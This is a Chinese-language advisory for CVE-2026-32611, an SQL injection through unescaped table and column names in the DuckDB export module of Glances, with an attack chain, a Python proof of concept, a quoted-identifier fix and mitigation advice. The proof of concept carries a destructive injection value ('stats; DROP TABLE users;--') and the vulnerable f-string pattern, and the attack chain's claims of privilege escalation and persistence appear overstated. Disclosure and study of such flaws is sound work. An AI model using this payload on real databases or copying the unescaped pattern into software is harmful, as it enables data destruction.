CVE-2026-32611 Glances DuckDB导出模块SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-32611

漏洞类型

SQL注入

CVSS评分

7.0 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Glances

漏洞概述

Glances是一款开源跨平台系统监控工具，用于监控CPU、内存、磁盘、网络等系统资源。该漏洞存在于Glances的DuckDB导出模块中，属于SQL注入漏洞。攻击者可以通过构造恶意的表名或列名，利用监控统计数据中未经过滤的用户输入，直接注入到SQL语句中执行。虽然DuckDB INSERT操作已使用参数化查询（?占位符），但DDL（数据定义语言）构造和表名引用部分未对标识符名称进行转义或参数化处理，攻击者无需认证即可利用此漏洞获取敏感数据或破坏数据库完整性。

技术细节

该漏洞的根本原因在于DuckDB导出模块（glances/exports/glances_duckdb/__init__.py）中的SQL语句构造方式不安全。具体来说，表名和列名直接通过Python f-string插值到SQL语句中，而没有进行适当的标识符转义或参数化。例如，在创建表或引用表名时，代码直接使用f"CREATE TABLE {table_name}..."的格式，而table_name来源于监控统计数据。虽然INSERT语句的值部分使用了参数化查询（?占位符），但标识符部分（如表名、列名）仍然存在注入风险。攻击者可以通过在表名或列名中注入SQL元字符或SQL语句片段，如使用单引号、分号或注释符等，来破坏SQL语句结构，执行未授权的数据库操作。修复方案应使用DuckDB的标识符转义机制或psycopg.sql类似的组合对象来安全处理标识符名称。

攻击链分析

STEP 1

步骤1

攻击者获取Glances监控工具的访问权限，监控数据被收集并准备导出到DuckDB数据库

STEP 2

步骤2

攻击者通过修改系统监控数据（如进程名、用户名、主机名等），注入包含SQL元字符的恶意数据

STEP 3

步骤3

Glances的DuckDB导出模块将恶意数据作为表名或列名，直接通过f-string插入到CREATE TABLE等DDL语句中

STEP 4

步骤4

构造的恶意SQL语句被执行，攻击者可执行未授权的数据库操作，如读取敏感数据、修改表结构或删除数据

STEP 5

步骤5

攻击者利用SQL注入漏洞进行数据窃取、权限提升或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-32611 PoC - DuckDB SQL Injection in Glances
# This PoC demonstrates SQL injection via table name in DuckDB export module

import duckdb

# Simulate the vulnerable code pattern from glances/exports/glances_duckdb/__init__.py
def vulnerable_table_creation(table_name):
    """Vulnerable function that directly interpolates table name into SQL"""
    # This is the vulnerable pattern: direct interpolation of user-controlled input
    sql = f"CREATE TABLE IF NOT EXISTS {table_name} (id INTEGER, value TEXT)"
    return sql

def vulnerable_insert(table_name, values):
    """INSERT uses parameterized query but table name is still vulnerable"""
    sql = f"INSERT INTO {table_name} VALUES (?, ?)"
    return sql, values

# Malicious input simulating attacker-controlled monitoring data
malicious_table_name = "stats; DROP TABLE users;--"

# Execute vulnerable SQL
conn = duckdb.connect(':memory:')
cursor = conn.cursor()

try:
    # Attempt to create table with malicious name
    sql = vulnerable_table_creation(malicious_table_name)
    print(f"[+] Generated SQL: {sql}")
    cursor.execute(sql)
    print("[!] Table created - potential injection vulnerability")
except Exception as e:
    print(f"[-] Error: {e}")

# Safer approach using identifier quoting
def safe_table_creation(table_name):
    """Fixed version using proper identifier escaping"""
    # Use backticks or double quotes to escape identifiers
    escaped_name = f'"{table_name.replace("\"", "\"\"")}"'
    sql = f"CREATE TABLE IF NOT EXISTS {escaped_name} (id INTEGER, value TEXT)"
    return sql

print("\n[+] Safe version:")
safe_sql = safe_table_creation(malicious_table_name)
print(f"    Generated SQL: {safe_sql}")

影响范围

Glances < 4.5.3 (DuckDB export module)

防御指南

临时缓解措施

如果无法立即升级，可临时禁用DuckDB导出功能，或在Glances配置中限制导出数据的来源。同时监控数据库日志，查找异常的SQL语句模式。建议关注官方安全公告，及时应用安全补丁。